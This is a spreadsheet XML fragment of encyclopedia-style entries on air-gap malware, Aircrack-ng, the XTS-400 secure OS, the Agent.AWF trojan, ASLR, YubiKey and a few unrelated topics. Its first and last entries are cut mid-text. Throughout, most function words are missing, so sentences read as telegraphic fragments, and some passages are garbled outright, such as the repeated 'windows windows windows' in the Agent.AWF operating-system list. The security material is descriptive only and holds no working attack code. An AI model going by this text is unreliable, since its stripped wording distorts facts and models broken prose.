designed defeat isolation using acoustic signaling. shortly that, network security researcher dragos ruiu's badbios received press attention.in 2014, researchers introduced airhopper, bifurcated attack pattern showing feasibility data exfiltration isolated computer nearby mobile phone, using frequency signals.in 2015, bitwhisper, covert signaling channel air-gapped computers using thermal manipulations introduced. bitwhisper supports bidirectional communication requires additional dedicated peripheral hardware.later 2015, researchers introduced gsmem, method exfiltrating data air-gapped computers cellular frequencies. transmission generated standard internal renders computer small cellular transmitter antenna.projectsauron malware discovered 2016 demonstrates infected device used remotely leak data air-gapped computer. malware remained undetected years relied hidden partitions drive visible windows transport channel air-gapped computer computer connected internet, presumably share files systems.nfcdrip name given discovery stealthy data exfiltration (near-field communication) radio abuse signal detection 2018. although enables devices establish effective communication bringing within centimeters other, researchers showed abused transmit information much longer range expected meters.in general, malware exploit various hardware combinations leak sensitive information air-gapped systems using "air-gap covert channels". these hardware combinations number different media bridge air-gap, including: acoustic, light, seismic, magnetic, thermal, radio-frequency. software updates from security perspective, main drawback gapped network inability software automatically self update. users system administrators must instead download install updates manually. strict update routine followed, results out-of-date software running network, contain known security vulnerabilities. adversary manages gain access gapped network (for instance contacting disgruntled employee using social engineering) able quickly spread within gapped network using vulnerabilities possibly higher success rate public internet. system administrators manage software updates gapped network using dedicated solutions windows server update services network logon scripts. such mechanisms would allow computers gapped network automatically install updates system administrator downloads updates internet once. problem completely eliminated though, especially users administrative privileges local workstations therefore able install software centrally managed. presence devices requiring firmware updates also complicate matters, since often updates cannot centrally managed. also malware firewall (computing) near sound data transfer niprnet siprnet sneakernet tempest (codename) phreaking references</t>
  </si>
  <si>
    <t>Air-gap malware</t>
  </si>
  <si>
    <t>air-gap malware malware designed defeat air-gap isolation secure computer systems using various air-gap covert channels. operation because modern computers, especially laptops, built-in microphones speakers, air-gap malware designed communicate secure information acoustically, frequencies near beyond limit human hearing. technique limited computers close physical proximity (about feet m)), also limited requirement transmitting receiving machines infected proper malware form communication link. physical proximity limit overcome creating acoustically linked mesh network, effective mesh network ultimately traditional ethernet connection outside world secure information removed secure facility. 2014, researchers introduced ″airhopper″, bifurcated attack pattern showing feasibility data exfiltration isolated computer nearby mobile phone, using frequency signals.in 2015, "bitwhisper", covert signaling channel air-gapped computers using thermal manipulations introduced. "bitwhisper" supports bidirectional communication requires additional dedicated peripheral hardware.later 2015, researchers introduced "gsmem", method exfiltrating data air-gapped computers cellular frequencies. transmission generated standard internal renders computer small cellular transmitter antenna.in 2016, researchers categorized various "out-of-band covert channels" (oob-ccs), malware communication channels require specialized hardware transmitter receiver. oob-ccs high-bandwidth conventional radio-frequency channels; however, capable leaking sensitive information require data rates communicate (e.g., text, recorded audio, cryptographic material). 2020, researchers eset research reported ramsay malware, cyber espionage framework toolkit collects steals sensitive documents like word documents systems air-gapped networks. general, researchers demonstrated air-gap covert channels realized number different mediums, including: acoustic light seismic magnetic thermal radio-frequency physical media also (networking) badbios references further reading guri, mordechai; kedma, gabi; kachlon, assaf; elovici, yuval (2014). "air hopper: bridging air-gap isolated networks mobile phones using radio frequencies". arxiv:1411.0237 [cs.cr]. quang; martini, ben; choo, kim-kwang raymond (2014). "exfiltrating data android devices". computers security. elsevier. 74–91. doi:10.1016/j.cose.2014.10.016. o'malley, samuel joseph; choo, kim-kwang raymond (may 2014). bridging gap: inaudible data exfiltration insiders. 20th americas conference information systems. association information systems. ssrn 2431593.</t>
  </si>
  <si>
    <t>Aircrack-ng</t>
  </si>
  <si>
    <t>aircrack-ng network software suite consisting detector, packet sniffer, wpa/wpa2-psk cracker analysis tool 802.11 wireless lans. works wireless network interface controller whose driver supports monitoring mode sniff 802.11a, 802.11b 802.11g traffic. program runs linux, freebsd, macos, openbsd, windows; linux version packaged openwrt also ported android, zaurus maemo platforms; proof concept port made iphone. april 2007 team darmstadt university technology germany developed attack method based paper released cipher shamir. this attack, named 'ptw', decreases number initialization vectors needed decrypt included aircrack-ng suite since release. aircrack-ng fork original aircrack project. found preinstalled tool many security-focused linux distributions kali linux parrot, share common attributes developed project (debian). features aircrack-ng software suite includes: also spoonwep/wpa kali linux (linux distribution digital forensics penetration testing) backtrack, predecessor sequence prediction attack references external links official website</t>
  </si>
  <si>
    <t>Xcopilot</t>
  </si>
  <si>
    <t>xcopilot palm pilot emulator runs unix/x11. offers emulation timer, serial ports, touch along motorola 68000 emulation (m68k), specifically freescale dragonball used palm pilots switched intel xscale processors (later dragonballs based core 68000 retained name, however used palm.) xcopilot originally developed ivan curtis contributions goldberg, dionne, kresten krab thorup, andrew pfiffer based windows program copilot. while original copilot application eventually turned palm emulator, unix/x11 port branched enjoyed popularity. written 1997, xcopilot aimed developers applications palm platform, freeing drudgery interfacing real hardware development process. xcopilot found role 2000s development uclinux, version linux meant low-end microprocessors without mmu. today xcopilot longer maintained still useful trying uclinux. references external links mccullough, david august 2002). "embedded linux tutorial: getting started with uclinux". dedicated systems encyclopedia. archived original march 2006. tutorial getting uclinux working xcopilot.</t>
  </si>
  <si>
    <t>Xbox 360 technical problems</t>
  </si>
  <si>
    <t>Alarm device</t>
  </si>
  <si>
    <t>alarm device mechanism gives audible, visual kind alarm signal alert someone problem condition requires urgent attention. etymology word alarm comes french l'arme meaning arms", weapons", telling armed pick weapons ready action enemy suddenly appeared.the word alarum archaic form alarm. sometimes used call arms stage directions elizabethan dramas. term comes italian all'armi appears times shakespeare's first folio. often explained off-stage sounds conflict disturbance, recent research suggests bell drum used rouse soldiers sleep. history development early alarm devices often bells, drums, musical instruments, items made unusual loud noises attracted attention surrounding population. whistles used police 19th century. steam whistles used locomotives, ships, factories alarm devices. with advent electricity, variety alerting devices invented, buzzers, klaxons, sirens, horns, flashing coloured lights, all-purpose alarms. alarm devices fitted buildings well vehicles. many buildings fitted fire alarms, ranging self-contained domestic smoke detector sophisticated alarm system operate building fire fighting systems automatically extinguish fires water inert gases. many industries developed standards alarm devices, colours red, blue amber generally recognized alarm device-related colours, flashing lights often indicating urgent conditions. responses alarm human reactions alarm often depend upbringing, psychological training, behavior others environment. consequently, ability test alarm hold regular drills practice appropriate response provided part alarm system. alarm devices intended cause evacuation occupied building, fire alarms, deliberately designed make remaining space difficult even painful order encourage occupants leave. some alarms startle cause fight-or-flight response humans; person mindset panic either flee perceived danger attempt eliminate often ignoring rational thought either case. person state characterized "alarmed". false alarms with kind alarm, must balance danger false alarms (called "false positives") signal going absence problem alarm failing signal actual problem (called "false negative"). false alarms waste resources expensively even dangerous. example, false alarms fire waste firefighter manpower, making unavailable real fire, risk injury firefighters others fire engines race alleged fire's location. addition, false alarms acclimatise people ignore alarm signals, thus possibly ignore actual emergency: aesop's fable cried wolf exemplifies problem. false alarm significant issues conventional alarm systems. they triggered several reasons, movement pets, typing wrong security codes, loud sounds windows doors. case fire alarms, aerosol sprays, smoking, burning food lead false alarm.many avoid risk false alarms ensuring alarms secured appropriate location, placing smoke detector fire alarm away kitchen smoke burned food large quantities steam trigger false alarm common occurrences. case security alarm, additional monitoring station assesses whether legitimate need help reduce false alarms. devices there many kinds alarm devices. common types include: alarm clock sounds alarm pre-set time, often used wake person remind event. fire alarm used give occupants building early warning potential fire give time evacuate. warning devices vehicle sound moving unexpected direction, reversing, siren, often accompanied flashing coloured lights, emergency vehicles responding emergencyalarm devices, category, include: burglar alarms, designed warn burglaries. this often silent alarm; enforcement guards warned without alerting burglar, increases chances stopping theft progress. alarm clocks beep, buzz ring time wake person reminders distributed control systems (dcs), found nuclear power plants, refineries chemical facilities, also generate alarms direct operator's attention important event need address. alarms operation maintenance (o&amp;m) monitoring system, alerts operator malfunction particular part system monitoring. first-out alarm safety alarms, dangerous condition occurs. common public safety alarms include: civil defense siren, also known tornado sirens raid sirens fire alarm systems fire alarm notification appliance "multiple-alarm fire", locally specific measure severity fire fire-department reaction required. smoke detector alarms autodialer alarm, also known community alarm personal alarm video alarm verification systems provides instant notifications upon detection possible threat verified video feed. tocsin historical alarm mechanism also alarm management warning system false alarm physical security security alarm references</t>
  </si>
  <si>
    <t>XTS-400</t>
  </si>
  <si>
    <t>xts-400 multilevel secure computer operating system. multiuser multitasking uses multilevel scheduling processing data information. works networked environments supports gigabit ethernet ipv4 ipv6. xts-400 combination intel hardware secure trusted operating program (stop) operating system. xts-400 developed systems, originally released version december 2003. stop provides high-assurance security first general-purpose operating system common criteria assurance level rating eal5 above. xts-400 host, trusted separate, multiple, concurrent data sets, users, networks different sensitivity levels. xts-400 provides untrusted environment normal work trusted environment administrative work privileged applications. untrusted environment similar traditional unix environments. provides binary compatibility linux applications running linux commands tools well linux applications without need recompiling. this untrusted environment includes window system gui, though windows screen must sensitivity level. support trusted environment various security features, stop provides proprietary apis applications. order develop programs proprietary apis, special software development environment (sde) needed. also needed order port complicated linux/unix applications xts-400. version stop operating system, stop since introduced, claims improved performance features rbac. uses high-assurance, system, xts-400 used cross-domain solutions, typically need piece privileged software developed temporarily circumvent security features controlled manner. such pieces outside evaluation xts-400, accredited. xts-400 used desktop, server, network gateway. interactive environment, typical unix command line tools, present support desktop solution. since xts-400 supports multiple, concurrent network connections different sensitivity levels, used replace several single-level desktops connected several different networks. support server functionality, xts-400 implemented rackmount configuration, accepts uninterruptible power supply (ups), allows multiple network connections, accommodates many hard disks scsi subsystem (also saving disk blocks using sparse file implementation file system), provides trusted backup/save tool. server software, internet daemon, ported xts-400. popular application high-assurance systems like xts-400 guard information flow networks differing security characteristics. several customer guard solutions available based systems. security xts-400 version 6.0.e completed common criteria (cc) evaluation march 2004 eal4 augmented alc_flr.3 (validation report ccevs-vr-04-0058.) version 6.0.e also conformed protection profiles entitled labeled security protection profile (lspp) controlled access protection profile (capp), though profiles surpassed functionality assurance. xts-400 version 6.1.e completed evaluation march 2005 eal5 augmented alc_flr.3 ate_ind.3 (validation report ccevs-vr-05-0094), still conforming lspp capp. eal5+ evaluation included analysis covert channels additional vulnerability analysis testing national security agency. xts-400 version 6.4.u4 completed evaluation july 2008 eal5 augmented alc_flr.3 ate_ind.3 (validation report ccevs-vr-vid10293-2008), also still conforming lspp capp. like predecessor, also included analysis covert channels additional vulnerability analysis testing national security agency. official postings xts-400 evaluations seen validated product list.the main security feature sets stop apart operating systems mandatory sensitivity policy. support mandatory integrity policy, also sets stop apart trusted systems. while sensitivity policy deals preventing unauthorized disclosure, integrity policy deals preventing unauthorized deletion modification (such damage virus might attempt). normal (i.e., untrusted) users discretion change sensitivity integrity levels objects. bell–lapadula biba formal models basis policies. both sensitivity integrity policies apply users objects system. stop provides hierarchical sensitivity levels, non-hierarchical sensitivity categories, hierarchical integrity levels, non-hierarchical integrity categories. mandatory sensitivity policy enforces united states department defense data sensitivity classification model (i.e., "unclassified," "secret," "top secret"), configured commercial environments. other security features include: identification authentication, forces users uniquely identified authenticated using system services accessing information; user's identification used access control decisions accountability auditing mechanism; discretionary access control (dac), appears unix, including presence access control lists every object; set-id function supported controlled fashion; mandatory subtype policy, allows functionality trusted systems support full type enforcement domain-type enforcement policy; auditing security-relevant events trusted tools allow administrators detect analyze potential security violations; trusted path, allows user sure s/he interacting directly trusted security functions (tsf) sensitive operations; prevents, example, trojan horse spoofing login process stealing user's password; isolation operating system code data files activity untrusted users processes which, particular, prevents malware corrupting otherwise affecting system; separation processes another process/user cannot tamper internal data code another process); reference monitor functionality, access bypass scrutiny operating system; strong separation administrator, operator, user roles using mandatory integrity policy; residual information (i.e., object reuse) mechanisms prevent data scavenging; trusted, evaluated tools configuring system, managing security-critical data, repairing file systems; self-testing security mechanisms, demand; exclusion higher layer network services tsf, susceptible publicly known vulnerabilities services.stop comes single package, confusion whether particular package security features present. mandatory policies cannot disabled. policy configuration require potentially complicated process defining large sets domains data types (and attendant access rules). maintain trustworthiness system, xts-400 must installed, booted, configured trusted personnel. site must also provide physical protection hardware components. system, software upgrades, shipped systems secure fashion. customers want them, xts-400 supports mission support cryptographic unit (mscu) fortezza cards. mscu performs type cryptography separately scrutinized united states national security agency. hardware evaluation forces particular hardware used xts-400. though places restrictions hardware configurations used, several configurations possible. xts-400 uses standard commercial off-the-shelf (cots) components, except optional mission support cryptographic unit (mscu). hardware based intel xeon (p4) central processing unit (cpu) speeds, supporting main memory. peripheral component interconnect (pci) used add-in cards gigabit ethernet. simultaneous ethernet connections made, configured different mandatory security integrity levels. scsi subsystem used allow number high-performance peripherals attached. scsi peripheral card reader support fortezza. multiple scsi host adapters included. history xts-400 preceded several evaluated ancestors, developed group: secure communications processor (scomp), xts-200, xts-300. predecessor products evaluated trusted computer system evaluation criteria (tcsec) (a.k.a. orange book) standards. scomp completed evaluation 1984 highest functional assurance level place: since product evolved proprietary hardware interfaces commodity hardware linux interfaces. xts-200 designed general-purpose operating system supporting unix-like application user environment. xts-200 completed evaluation 1992 level. xts-300 transitioned proprietary, mini-computer hardware cots, intel hardware. xts-300 completed evaluation 1994 level. xts-300 also went several ratings maintenance cycles (a.k.a. ramp), similar assurance continuity cycle ultimately ending version 5.2.e evaluated 2000. development xts-400 began june 2000. main customer-visible change specific conformance linux api. though security features system restrictions require additional, proprietary interfaces, conformance close enough applications without recompilation. some security features added improved compared earlier versions system performance also improved. july 2006, enhancements continue made line products. september 2006, united states patent offices granted systems information technology, llc. united states patent 7,103,914 "trusted computer system". architecture stop monolithic kernel operating system linux). though provides linux-compatible api, stop derived unix unix-like system. stop highly layered, highly modularized, relatively compact simple. these characteristics historically facilitated high-assurance evaluations. stop layered four rings ring subdivided layers. innermost ring hardware privilege applications, including privileged commands, outermost. inner three rings constitute kernel. software outer ring prevented tampering software inner ring. kernel part every process's address space needed normal privileged processes. security kernel occupies innermost privileged ring enforces mandatory policies. provides virtual process environment, isolates process another. performs low-level scheduling, memory management, interrupt handling. security kernel also provides services message mechanism. security kernel's data global system. trusted system services (tss) software executes ring implements file systems, implements tcp/ip, enforces discretionary access control policy file system objects. tss's data local process within executing. operating system services (oss) executes ring provides linux-like applications well providing additional proprietary interfaces using security features system. implements signals, process groups, memory devices. oss's data local process within executing. software considered trusted performs functions upon system depends enforce security policy (e.g., establishment user authorization). this determination based integrity level privileges. untrusted software runs integrity level integrity categories, lower. some processes require privileges perform functions—for example secure server needs access user access authentication database, kept system high, establishing session user lower sensitivity level. potential weaknesses xts-400 provide high level security many application environments, trade-offs made attain potential weaknesses customers include: lower performance rigid internal layering modularity additional security checks; fewer application-level features available out-of-the-box; some source level changes necessary complicated applications run; trusted user interface utilize limited command line features; limited hardware choices; suited embedded real-time environments. references external links official website, xts-400 eal5+ validated product page xts-400 eal5+ archived validated product page xts-400 eal4+ archived validated product page united states patent 7,103,914: trusted computer system paper need secure operating systems mandatory security monterey security architecture (mysea), naval postgraduate school project utilized stop xmpp cross domain collaborative information environment (cdcie) overview, multinational information sharing single cross domain environments (utilizes stop</t>
  </si>
  <si>
    <t>Agent.AWF</t>
  </si>
  <si>
    <t>agent.awf) malicious trojan downloader affecting microsoft windows operating system. methods infection this trojan considered obsolete, known variants wild. affected operating systems following operating systems known affected. windows windows 2003 windows 2000 windows windows windows windows operation agent.awf displays virus activity replaces files user's computer copy itself, moves original, legitimate file back sub-folder. known attempt terminate security software, trojan downloads backdoor onto computer, allowing attacker compromise computer. also known modify windows registry. agent.awf spread automatically: needs attacking user's intervention order reach affected computer. means transmission used include, among others, floppy disks, cd-roms, emails attached files, internet downloads, ftp, channels, peer-to-peer (p2p) file sharing networks, etc. identification during installation, following files created, present compromised system. abc123.pid svcipa.exe nod32kui.exe references</t>
  </si>
  <si>
    <t>XRY (software)</t>
  </si>
  <si>
    <t>digital forensics mobile device forensics product swedish company msab used analyze recover information mobile devices mobile phones, smartphones, navigation tools tablet computers. consists hardware device connect phones software extract data.xry designed recover contents device forensic manner contents data relied upon user. typically used civil/criminal investigations, intelligence operations, data compliance electronic discovery cases. software available enforcement, military intelligence agencies. become well known digital forensics community common tools type work.there many complex challenges examining mobile phones comparison forensic examination normal computers. many mobile phones proprietary operating systems, makes reverse engineering devices complex operation. speed mobile device market also means many devices manufactured regular basis, mobile forensics tool must deal issues suitable task. system allows logical examinations (direct communication device operating system) also physical examinations (bypassing operating system dumping available memory). whilst logical recovery data generally better supported devices, physical examination offers ability recover deleted information text messages, images call records etc. because complexities topic, specialist training usually recommended operate software. latest versions include support recover data smartphone apps android, iphone blackberry devices. data recovered used successfully various court systems around world.xry tested number different government organizations suitable needs worldwide use. references external links lucie blanchard. "fillon guéant veulent "engager lutte armes égales" avec délinquants" [fillon guéant want "start fight equal terms" offenders] french). archived original 2011. what .xry? micro systemation website</t>
  </si>
  <si>
    <t>Adiantum (cipher)</t>
  </si>
  <si>
    <t>adiantum cipher construction disk encryption, uses chacha advanced encryption standard (aes) ciphers, poly1305 cryptographic message authentication code (mac).it designed 2018 paul crowley eric biggers google specifically low-powered mobile devices running android included linux kernel since version 5.0.hpolyc earlier variant adiantum, uses different construction poly1305 hash function. adiantum implemented android alternative cipher device encryption, particularly low-end devices lacking hardware-accelerated support aes. company stated adiantum five times faster aes-256-xts cortex-a7 cpus. google previously exempted devices mandatory device encryption specifications affected system performance enabled. introduction adiantum, device encryption becomes mandatory android devices beginning android references external links adiantum github android open source project: enabling adiantum</t>
  </si>
  <si>
    <t>Address space layout randomization</t>
  </si>
  <si>
    <t>address space layout randomization (aslr) computer security technique involved preventing exploitation memory corruption vulnerabilities. order prevent attacker reliably jumping example, particular exploited function memory, aslr randomly arranges address space positions data areas process, including base executable positions stack, heap libraries. history linux project first coined term "aslr", published first design implementation aslr july 2001 patch linux kernel. seen complete implementation, providing also patch kernel stack randomization since october 2002.the first mainstream operating system support aslr default openbsd version 2003, followed linux 2005. benefits address space randomization hinders types security attacks making difficult attacker predict target addresses. example, attackers trying execute return-to-libc attacks must locate code executed, attackers trying execute shellcode injected stack find stack first. cases, system obscures related memory-addresses attackers. these values guessed, mistaken guess usually recoverable application crashing. effectiveness address space layout randomization based upon chance attacker guessing locations randomly placed areas. security increased increasing search space. thus, address space randomization effective entropy present random offsets. entropy increased either raising amount virtual memory area space randomization occurs reducing period randomization occurs. period typically implemented small possible, systems must increase space randomization. defeat randomization, attackers must successfully guess positions areas wish attack. data areas stack heap, custom code useful data loaded, state attacked using slides code repeated copies data. this allows attack succeed area randomized handful values. contrast, code areas library base main executable need discovered exactly. often areas mixed, example stack frames injected onto stack library returned into. following variables declared: {\displaystyle e_{s}} (entropy bits stack top) {\displaystyle e_{m}} (entropy bits mmap() base) {\displaystyle e_{x}} (entropy bits main executable base) {\displaystyle e_{h}} (entropy bits heap base) {\displaystyle a_{s}} (attacked bits attempt stack entropy) {\displaystyle a_{m}} (attacked bits attempt mmap() base entropy) {\displaystyle a_{x}} (attacked bits attempt main executable entropy) {\displaystyle a_{h}} (attacked bits attempt heap base entropy) {\displaystyle \alpha (attempts made) {\displaystyle (total amount entropy: {\displaystyle n=(e_{s}-a_{s})+(e_{m}-a_{m})+(e_{x}-a_{x})+(e_{h}-a_{h})\,} calculate probability attacker succeeding, assume number attempts carried without interrupted signature-based ips, enforcement, factor; case brute forcing, daemon cannot restarted. also figure many bits relevant many attacked attempt, leaving however many bits attacker defeat. following formulas represent probability success given attempts bits entropy. {\displaystyle g\left(\alpha \,\right)=1-{\left(1-{2^{-n}}\right)^{\alpha }\,}\,{\text{ }}0\leq \,\alpha (isolated guessing; address space re-randomized attempt) {\displaystyle b\left(\alpha \,\right)={\frac {\alpha \,}{2^{n}}}\,{\text{ }}0\leq \,\alpha \,\leq \,{2^{n}}} (systematic brute forcing copies program address space)in many systems, {\displaystyle 2^{n}} thousands millions; modern 64-bit systems, numbers typically reach millions least, hector marco-gisbert ismael ripoll showed 2014 bypass aslr 64-bit systems less second certain circumstances. 32-bit systems 2004 computer speeds bits address randomization, shacham co-workers state "... bits address randomization defeated brute force attack within minutes." authors' statement depends ability attack application multiple times without delay. proper implementations aslr, like included grsecurity, provide several methods make brute force attacks infeasible. method involves preventing executable executing configurable amount time crashed certain number times. android, possibly systems, implement library load order randomization, form aslr randomizes order libraries loaded. this supplies little entropy. approximation number bits entropy supplied needed library appears below; account varied library sizes, actual entropy gained really somewhat higher. note attackers usually need library; math complex multiple libraries, shown well. note case attacker using library simplification complex formula {\displaystyle l=1} (number libraries loaded) (number libraries used attacker) {\displaystyle e_{m}={\begin{cases}\log _{2}\left(l\right)&amp;{\text{ }}\beta \,=1,l\geq \,1\\\sum _{i=l}^{l-\left(\beta \,-1\right)}\log _{2}\left(i\right)&amp;{\text{ }}\beta \,\geq \,1,l\geq \,1\end{cases}}} these values tend even large values importantly since attackers typically standard library thus often assume {\displaystyle \beta \,=1} however, even small number libraries bits entropy gained here; thus potentially interesting combine library load order randomization address randomization gain extra bits entropy. note extra bits entropy apply mmap() segments, libraries. reducing entropy attackers make several methods reduce entropy present randomized address space, ranging simple information leaks attacking multiple bits entropy attack (such heap spraying). there little done this. possible leak information memory layout using format string vulnerabilities. format string functions printf variable argument list job; format specifiers describe argument list looks like. because arguments typically passed, format specifier moves closer stack frame. eventually, return pointer stack frame pointer extracted, revealing address vulnerable library address known stack frame; eliminate library stack randomization obstacle attacker. also decrease entropy stack heap. stack typically must aligned bytes, smallest possible randomization interval; heap must page-aligned, typically 4096 bytes. when attempting attack, possible align duplicate attacks intervals; slide used shellcode injection, string '/bin/sh' replaced '////////bin/sh' arbitrary number slashes attempting return system. number bits removed exactly {\displaystyle \log _{2}\!\left(n\right)} intervals attacked. such decreases limited amount data stack heap. stack, example, typically limited grows much less; allows bits, although conservative estimate would around 8–10 bits corresponding 4–16 stack stuffing. heap hand limited behavior memory allocator; case glibc, allocations created using mmap, limiting attackers bits reduction. this also limiting factor brute forcing; although number attacks perform reduced, size attacks increased enough behavior could circumstances become apparent intrusion detection systems. limitations aslr-protected addresses leaked various side channels, removing mitigation utility. recent attacks used information leaked branch target predictor buffer (btb) memory management unit (mmu) walking page tables. clear class aslr attack mitigated. cannot, benefit aslr reduced eliminated. implementations several mainstream, general-purpose operating systems implement aslr. android android cream sandwich provides address space layout randomization (aslr) help protect system third-party applications exploits memory-management issues. position-independent executable support added android 4.1. android dropped non-pie support requires dynamically linked binaries position independent. library load ordering randomization accepted android open-source project october 2015, included android release. dragonfly dragonfly implementation aslr based upon openbsd's model, added 2010. default, enabled setting sysctl vm.randomize_mmap freebsd support aslr appeared freebsd 13.0. disabled default. (iphone, ipod touch, ipad) apple introduced aslr (released march 2011).kaslr introduced randomized kernel base 0x01000000 ((1+0xrr) 0x00200000), 0xrr random byte sha1 (random data) generated iboot (the 2nd-stage boot loader). linux linux kernel enabled weak form aslr default since kernel version 2.6.12, released june 2005. exec shield patchsets linux kernel provide complete implementations. exec shield patch linux supplies bits stack entropy period bytes, bits mmap base randomization period page 4096 bytes. this places stack base area wide containing 524,288 possible positions, mmap base area wide containing possible positions. position-independent executable (pie) implements random base address main executable binary place since 2003. provides address randomness main executable used shared libraries. feature cannot used together prelink feature executable. prelink tool implements randomization prelink time rather runtime, design prelink aims handle relocating libraries dynamic linker allows relocation occur many runs program. result, real address space randomization would defeat purpose prelinking. randomization disabled specific process changing execution domain, using personality(2). kernel address space layout randomization kernel address space layout randomization (kaslr) enables address space randomization linux kernel image randomizing kernel code placed boot time. kaslr merged linux kernel mainline kernel version 3.14, released march 2014. when compiled disabled boot time specifying nokaslr kernel's boot parameters.there several side-channel attacks processors could leak kernel addresses. late 2017, kernel page-table isolation (kpti kaiser) developed defeat attacks. however, method cannot protect side-channel attacks utilizing collisions branch predictor structures.as 2021, finer grained kernel address space layout randomization function granular kaslr, fgkaslr) planned extension kaslr randomize function level. microsoft windows microsoft's windows vista (released january 2007) later aslr enabled executables dynamic link libraries specifically linked aslr-enabled. compatibility, enabled default applications. typically, older software incompatible aslr fully enabled editing registry entry hklm\system\currentcontrolset\control\session manager\memory management\moveimages, installing microsoft's enhanced mitigation experience toolkit. locations heap, stack, process environment block, thread environment block also randomized. security whitepaper symantec noted aslr 32-bit windows vista robust expected, microsoft acknowledged weakness implementation.host-based intrusion prevention systems wehntrust ozone also offer aslr windows windows server 2003 operating systems. wehntrust open-source. complete details ozone's implementation available.it noted february 2012 aslr 32-bit windows systems prior windows effectiveness reduced memory situations. similar effect also achieved linux research. test code caused 10.7.3 system kernel panic, left unclear aslr behavior scenario. netbsd support aslr userland appeared netbsd (released april 2009), enabled default netbsd-current april 2016.kernel aslr support amd64 added netbsd-current october 2017, making netbsd first system support kaslr. openbsd 2003, openbsd became first mainstream operating system support strong form aslr activate default. openbsd completed aslr support 2008 added support binaries. openbsd 4.4's malloc(3) designed improve security taking advantage aslr page features implemented part openbsd's mmap system call, detect use-after-free bugs. released 2013, openbsd first mainstream operating system enable position-independent executables default multiple hardware platforms, openbsd activated position-independent static binaries (static-pie) default. macos leopard 10.5 (released october 2007), apple introduced randomization system libraries.in lion 10.7 (released july 2011), apple expanded implementation cover applications, stating "address space layout randomization (aslr) improved applications. available 32-bit apps heap memory protections), making 64-bit 32-bit applications resistant attack."as mountain lion 10.8 (released july 2012) later, entire system including kernel well kexts zones randomly relocated system boot. solaris aslr introduced solaris beginning solaris 11.1 (released october 2012). aslr solaris 11.1 system-wide, zone, per-binary basis. exploitation side-channel attack utilizing branch target buffer demonstrated bypass aslr protection. 2017, attack named "aslr⊕cache" demonstrated could defeat aslr browser using javascript. also buffer overflow stack buffer overflow stack-smashing protection references external links exploit mitigation techniques: update after years archived 2014-02-20 wayback machine openbsd documentation aslr comparison exec shield address space layout randomization windows vista michael howard's aslr windows 2000/xp/2003 (wehntrust) bypassing aslr protection effectiveness address space layout randomization test applications libraries) aslr support aslr smack laugh reference</t>
  </si>
  <si>
    <t>YubiKey</t>
  </si>
  <si>
    <t>yubikey hardware authentication device manufactured yubico protect access computers, networks, online services supports one-time passwords (otp), public-key cryptography, authentication, universal factor (u2f) fido2 protocols developed fido alliance. allows users securely accounts emitting one-time passwords using fido-based public/private pair generated device. yubikey also allows storing static passwords sites support one-time passwords. google, amazon, microsoft, twitter, facebook yubikey devices secure employee accounts well user accounts. some password managers support yubikey. yubico also manufactures security key, similar lower cost device fido2/webauthn fido/u2f support.the yubikey implements hmac-based one-time password algorithm (hotp) time-based one-time password algorithm (totp), identifies keyboard delivers one-time password protocol. yubikey also present openpgp card using 1024, 2048, 3072 4096-bit (for sizes 2048 bits, gnupg version higher required) elliptic curve cryptography (ecc) p256, p384 depending version, allowing users sign, encrypt decrypt messages without exposing private keys outside world. also supported pkcs#11 standard emulate smart card. this feature allows code signing docker images well certificate-based authentication microsoft active directory ssh.founded 2007 stina ehrensvärd, yubico private company offices palo alto, seattle, stockholm. yubico cto, jakob ehrensvärd, lead author original strong authentication specification became known universal factor (u2f).yubikey released yubikey series 2018 adds support fido2. history yubico founded 2007 began offering pilot developers november year. original yubikey product shown annual conference april 2008, robust yubikey model launched 2009. name "yubikey" derives japanese word finger.yubikey later models "slots" available, storing distinct configurations separate secrets settings. when authenticating first slot used briefly pressing button device, second slot gets used holding button seconds. 2010, yubico began offering yubikey oath yubikey rfid models. yubikey oath added ability generate 8-character one-time passwords using protocols initiative open authentication (oath), addition 32-character passwords used yubico's authentication scheme. yubikey rfid model included oath capability plus also included mifare classic radio-frequency identification chip, though separate device within package could configured normal yubico software connection.yubico announced yubikey nano february 2012, miniaturized version standard yubikey designed would almost entirely inside port expose small touch button. most later models yubikey also available standard "nano" sizes. 2012 also introduction yubikey neo, improved upon previous yubikey rfid product implementing near-field communication (nfc) technology integrating side device. yubikey (and neo-n, "nano" version device) able transmit one-time passwords readers part configurable contained data exchange format (ndef) message. also able communicate using ccid smart-card protocol addition (human interface device) keyboard emulation. ccid mode used smart card openpgp support, used one-time password authentication schemes.in 2014, yubikey updated fido universal factor (u2f) support. later year, yubico released fido security key, specifically included support none one-time password, static password, smart card, features previous yubikeys. launch, correspondingly sold lower price point $18, compared yubikey standard ($40 nano version), yubikey ($60 neo-n). some pre-release devices issued google fido/u2f development reported "yubico winusb gnubby (gnubby1)".in april 2015, company launched yubikey edge standard nano form factors. this slotted fido products feature-wise, designed handle authentication, include smart card support.the yubikey family devices first launched november 2015, usb-a models standard nano sizes. yubikey includes features yubikey neo, including increasing allowed openpgp size 4096 bits (vs. previous 2048), dropped capability neo. 2017, yubico announced expansion yubikey series support usb-c design. yubikey released february 2017. android usb-c connection, one-time password feature supported android yubikey, features currently supported including universal factor (u2f). nano version became available september 2017.in april 2018, company brought security yubico, first device implement fido2 authentication protocols, webauthn (which reached candidate recommendation status march) client authenticator protocol (ctap). launch, device available "standard" form factor usb-a connector. like previous fido security key, blue color uses icon button. distinguished number etched plastic button keyring hole. also less expensive yubikey yubikey models, costing unit launch lacks smart card features previous devices, though retains fido capability. product features list primary features capabilities yubikey products. modhex when used one-time passwords stored static passwords, yubikey emits characters using modified hexadecimal alphabet intended independent system keyboard settings possible. this alphabet, referred modhex modified hexadecimal, consists characters "cbdefghijklnrtuv", corresponding hexadecimal digits "0123456789abcdef". yubikeys using keyboard scan codes mode, problems using devices computers different keyboard layouts, dvorak. recommended either operating system features temporarily switch standard keyboard layout similar) using one-time passwords, although yubikey later devices configured alternate scan codes match layouts compatible modhex character set.u2f authentication yubikeys security keys bypasses problem using alternate u2fhid protocol, sends receives binary messages instead keyboard scan codes. ccid mode acts smart card reader, protocols all. security issues yubikey closed-sourcing concerns example security obscurity, code runs yubikey closed source. while yubico released code industry standard functionality like hotp disclosed generation product code units ship with. because units permanently firmware locked factory possible compile open source code load device manually, user must trust code authentic secure. code functionality u2f, modhex entirely closed source. 2016, yubico jakob ehrensvärd responded open-source community's concerns blog post saying "we, product company, taken clear stand implementations based off-the-shelf components believe something like commercial-grade controller unfit used security product."techdirt founder mike masnick strongly criticized decision, saying "encryption tricky. there almost always vulnerabilities bugs point we've making lately. best tends getting many knowledgeable eyes code possible. that's possible closed source." roca 